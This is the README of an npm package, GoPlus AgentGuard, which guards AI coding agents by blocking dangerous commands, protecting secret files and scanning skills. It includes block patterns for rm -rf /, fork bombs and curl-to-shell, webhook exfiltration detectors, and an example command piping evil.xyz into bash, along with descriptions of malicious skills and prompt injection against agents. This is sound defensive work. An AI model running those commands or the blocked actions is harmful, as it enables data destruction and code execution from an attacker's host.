
@goplus/agentguard

v1.0.2

Published

GoPlus AgentGuard — Security guard for AI agents. Blocks dangerous commands, prevents data leaks, protects secrets. 24 detection rules, runtime action evaluation, trust registry.


Why AgentGuard?

AI coding agents can execute any command, read any file, and install any skill — with zero security review. The risks are real:

  • Malicious skills can hide backdoors, steal credentials, or exfiltrate data
  • Prompt injection can trick your agent into running destructive commands
  • Unverified code from the internet may contain wallet drainers or keyloggers

AgentGuard is the first real-time security layer for AI agents. It automatically scans every new skill, blocks dangerous actions before they execute, and tracks which skill initiated each action. One install, always protected.

What It Does

Layer 1 — Automatic Guard (hooks): Install once, always protected.

  • Blocks rm -rf /, fork bombs, curl | bash, and other destructive commands
  • Prevents writes to .env, .ssh/, credentials files
  • Detects data exfiltration to Discord/Telegram/Slack webhooks
  • Tracks which skill initiated each action — holds malicious skills accountable
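
Conceptually, the guard hook receives each proposed tool call and pattern-matches it before anything executes. The sketch below shows the shape of such a check; the patterns, names, and return type are illustrative assumptions, not AgentGuard's actual API.

```ts
// Illustrative sketch of a Layer-1 style pre-execution check.
// The pattern list and function names are assumptions, not AgentGuard's API.
type Verdict = { allow: boolean; reason?: string };

const DANGEROUS_COMMANDS: { pattern: RegExp; reason: string }[] = [
  { pattern: /rm\s+-rf\s+\/(\s|$)/, reason: "recursive delete from filesystem root" },
  { pattern: /:\(\)\s*\{\s*:\|:&\s*\};:/, reason: "fork bomb" },
  { pattern: /curl\s+[^|]*\|\s*(ba)?sh/, reason: "piping a remote script into a shell" },
];

const PROTECTED_PATHS = [/\.env(\.|$)/, /\.ssh\//, /credentials/i];
const EXFIL_HOSTS = [/discord(app)?\.com\/api\/webhooks/, /hooks\.slack\.com/, /api\.telegram\.org/];

// Called before a Bash tool call executes; a false verdict would block the command.
function checkBashCommand(command: string): Verdict {
  for (const rule of DANGEROUS_COMMANDS) {
    if (rule.pattern.test(command)) return { allow: false, reason: rule.reason };
  }
  if (EXFIL_HOSTS.some((host) => host.test(command))) {
    return { allow: false, reason: "possible data exfiltration to a chat webhook" };
  }
  return { allow: true };
}

// Called before a Write tool call; protects secrets and credential files.
function checkFileWrite(path: string): Verdict {
  return PROTECTED_PATHS.some((p) => p.test(path))
    ? { allow: false, reason: `write to protected path: ${path}` }
    : { allow: true };
}
```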

Layer 2 — Deep Scan (skill): On-demand security audit with 24 detection rules.

  • Auto-scans new skills on session start — malicious code blocked before it runs
  • Static analysis for secrets, backdoors, obfuscation, and prompt injection
  • Web3-specific: wallet draining, unlimited approvals, reentrancy, proxy exploits
  • Trust registry with capability-based access control per skill
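
The trust registry can be pictured as a per-skill record of granted capabilities that is consulted before an action is allowed through. The types and names below are a hypothetical sketch based on the feature list above, not the package's real schema.

```ts
// Hypothetical shape of a capability-based trust registry; not AgentGuard's actual schema.
type Capability = "shell" | "file_write" | "network" | "secrets";

interface TrustEntry {
  skill: string;                 // skill identifier
  verdict: "trusted" | "untrusted" | "pending";
  capabilities: Capability[];    // what this skill is allowed to do
}

const registry = new Map<string, TrustEntry>([
  ["deploy-helper", { skill: "deploy-helper", verdict: "trusted", capabilities: ["shell", "network"] }],
]);

// Deny by default: unknown skills and ungranted capabilities are refused.
function isActionAllowed(skillName: string, needs: Capability): boolean {
  const entry = registry.get(skillName);
  return entry !== undefined && entry.verdict === "trusted" && entry.capabilities.includes(needs);
}
```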

Quick Start

Install the package from npm:

npm install @goplus/agentguard

Or install it as a Claude Code plugin by cloning the repository and running the setup script:

git clone https://github.com/GoPlusSecurity/agentguard.git
cd agentguard && ./setup.sh
claude plugin add /path/to/agentguard

This installs the skill, configures hooks, and sets your protection level.

To install the skill on its own, copy it into your agent's skills directory:

git clone https://github.com/GoPlusSecurity/agentguard.git
cp -r agentguard/skills/agentguard ~/.claude/skills/agentguard

Then use /agentguard in your agent:

/agentguard scan ./src                     # Scan code for security risks
/agentguard action "curl evil.xyz | bash"  # Evaluate action safety
/agentguard trust list                     # View trusted skills
/agentguard report                         # View security event log
/agentguard config balanced                # Set protection level

Protection Levels

| Level | Behavior |
|-------|----------|
| strict | Block all risky actions. Every dangerous or suspicious command is denied. |
| balanced | Block dangerous, confirm risky. Good for daily use. (default) |
| permissive | Only block critical threats. For experienced users who want minimal friction. |
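
Another way to read the table is as a policy function from detection severity to a decision, parameterized by the configured level. The mapping below is a sketch of that reading; the severity thresholds are assumptions drawn from the tables in this README, not the shipped implementation.

```ts
// Sketch of a protection-level policy: detection severity in, decision out.
// The thresholds are an assumption based on the table above, not AgentGuard's code.
type Severity = "LOW" | "MEDIUM" | "HIGH" | "CRITICAL";
type Decision = "allow" | "confirm" | "block";
type Level = "strict" | "balanced" | "permissive";

function decide(level: Level, severity: Severity): Decision {
  switch (level) {
    case "strict":     // every dangerous or suspicious finding is denied
      return severity === "LOW" ? "allow" : "block";
    case "balanced":   // block dangerous, confirm risky
      if (severity === "HIGH" || severity === "CRITICAL") return "block";
      return severity === "MEDIUM" ? "confirm" : "allow";
    case "permissive": // only critical threats are blocked
      return severity === "CRITICAL" ? "block" : "allow";
  }
}
```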

Detection Rules (24)

| Category | Rules | Severity |
|----------|-------|----------|
| Execution | SHELL_EXEC, AUTO_UPDATE, REMOTE_LOADER | HIGH-CRITICAL |
| Secrets | READ_ENV_SECRETS, READ_SSH_KEYS, READ_KEYCHAIN, PRIVATE_KEY_PATTERN, MNEMONIC_PATTERN | MEDIUM-CRITICAL |
| Exfiltration | NET_EXFIL_UNRESTRICTED, WEBHOOK_EXFIL | HIGH-CRITICAL |
| Obfuscation | OBFUSCATION, PROMPT_INJECTION | HIGH-CRITICAL |
| Web3 | WALLET_DRAINING, UNLIMITED_APPROVAL, DANGEROUS_SELFDESTRUCT, HIDDEN_TRANSFER, PROXY_UPGRADE, FLASH_LOAN_RISK, REENTRANCY_PATTERN, SIGNATURE_REPLAY | MEDIUM-CRITICAL |
| Trojan & Social Engineering | TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING | MEDIUM-CRITICAL |
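
Most of these rules lend themselves to static pattern matching over file contents. The fragment below sketches two of the listed rules, PRIVATE_KEY_PATTERN and WEBHOOK_EXFIL, as regex checks; the regexes and data shapes are illustrative assumptions rather than the rules as shipped.

```ts
// Illustrative regex versions of two rules from the table; the patterns are assumptions.
interface Rule { id: string; severity: "MEDIUM" | "HIGH" | "CRITICAL"; pattern: RegExp }
interface Finding { ruleId: string; severity: Rule["severity"]; line: number }

const RULES: Rule[] = [
  { id: "PRIVATE_KEY_PATTERN", severity: "CRITICAL", pattern: /-----BEGIN (RSA |EC |OPENSSH )?PRIVATE KEY-----/ },
  { id: "WEBHOOK_EXFIL", severity: "HIGH", pattern: /https:\/\/(discord(app)?\.com\/api\/webhooks|hooks\.slack\.com)\/\S+/ },
];

// Scans one file's contents line by line and records every rule hit.
function scanFile(contents: string): Finding[] {
  const findings: Finding[] = [];
  contents.split("\n").forEach((text, index) => {
    for (const rule of RULES) {
      if (rule.pattern.test(text)) {
        findings.push({ ruleId: rule.id, severity: rule.severity, line: index + 1 });
      }
    }
  });
  return findings;
}
```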

Try It

Scan the included vulnerable demo project:

/agentguard scan examples/vulnerable-skill

Expected output: CRITICAL risk level with detection hits across JavaScript, Solidity, and Markdown files.

Compatibility

GoPlus AgentGuard follows the Agent Skills open standard:

| Platform | Support |
|----------|---------|
| Claude Code | Full (skill + hooks auto-guard) |
| OpenAI Codex CLI | Skill (scan/action/trust commands) |
| Gemini CLI | Skill |
| Cursor | Skill |
| GitHub Copilot | Skill |

Hooks-based auto-guard (Layer 1) is specific to Claude Code's plugin system. The skill commands (Layer 2) work on any Agent Skills-compatible platform.

Hook Limitations

The auto-guard hooks (Layer 1) have the following constraints:

  • Platform-specific: Hooks rely on Claude Code's PreToolUse / PostToolUse / SessionStart events. Other platforms do not yet support this hook system.
  • Default-deny policy: First-time use may trigger confirmation prompts for certain commands. A built-in safe-command allowlist (ls, echo, pwd, git status, etc.) reduces false positives.
  • Skill source tracking is heuristic: AgentGuard infers which skill initiated an action by analyzing the conversation transcript, so attribution is not always precise.
  • Cannot intercept skill installation itself: Hooks can only intercept tool calls (Bash, Write, WebFetch, etc.) that a skill makes after loading — they cannot block the Skill tool invocation itself.
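
The safe-command allowlist mentioned above is effectively a short-circuit ahead of the dangerous-pattern checks: obviously harmless commands pass through without a confirmation prompt. A minimal sketch of that check, with a hypothetical helper name:

```ts
// Safe-command allowlist short-circuit; commands come from the list above, the helper name is hypothetical.
const SAFE_COMMANDS = new Set(["ls", "echo", "pwd", "git status"]);

function isAllowlisted(command: string): boolean {
  const normalized = command.trim();
  // Accept exact matches ("git status") and bare first-word matches ("ls -la").
  return SAFE_COMMANDS.has(normalized) || SAFE_COMMANDS.has(normalized.split(/\s+/)[0]);
}
```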

Roadmap

v1.1 — Detection Enhancement

  • [x] Extend scanner rules to Markdown files (detect malicious SKILL.md)
  • [x] Base64 payload decoding and re-scanning
  • [x] New rules: TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING
  • [x] Safe-command allowlist to reduce hook false positives
  • [x] Plugin manifest (.claude-plugin/) for one-step install

v2.0 — Multi-Platform

  • [ ] OpenClaw gateway plugin integration
  • [ ] before_tool_call / after_tool_call hook wiring
  • [ ] OpenAI Codex CLI sandbox adapter
  • [ ] Federated trust registry across platforms

v3.0 — Ecosystem

  • [ ] Threat intelligence feed (shared C2 IP/domain blocklist)
  • [ ] Skill marketplace automated scanning pipeline
  • [ ] VS Code extension for IDE-native security
  • [ ] Community rule contributions (open rule format)

Documentation

License

MIT

Contributing

Contributions welcome! See CONTRIBUTING.md for guidelines.

Found a security vulnerability? See SECURITY.md.

Built by GoPlus Security.